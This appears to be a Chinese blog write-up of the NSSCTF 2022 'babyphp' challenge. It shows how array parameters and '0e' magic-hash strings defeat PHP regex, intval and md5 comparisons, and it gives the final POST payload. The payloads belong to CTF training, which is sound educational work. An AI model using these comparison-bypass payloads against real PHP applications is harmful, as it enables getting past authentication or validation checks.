解:[NSSCTF 2022 Spring Recruit]babyphp--TLS_预备队任务(1)

题目

一、对于前两个if的比较:

$_POST['a'])&&!preg_match('/[0-9]/',$_POST['a'])&&intval($_POST['a'])
$_POST['b1']!=$_POST['b2']&&md5($_POST['b1'])===md5($_POST['b2'])

利用数组传参绕过。

payload:

a[]=1&b1[]=1&b2[]=2

二、对于最后一个if内的比较:

$_POST['c1']!=$_POST['c2']&&is_string($_POST['c1'])&&is_string($_POST['c2'])&&md5($_POST['c1'])==md5($_POST['c2'])

这里不能进行数组传参了。

payload:

c1=MMHUWUV&c2=MAUXXQC

三、贴上可绕过md5弱比较的字符串及其md5值:

MMHUWUV    0e701732711630150438129209816536

MAUXXQC       0e478478466848439040434801845361

IHKFRNS          0e256160682445802696926137988570

GZECLQZ         0e537612333747236407713628225676

Final、最终payload:

a[]=1&b1[]=1&b2[]=2&c1=MMHUWUV&c2=MAUXXQC

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值
>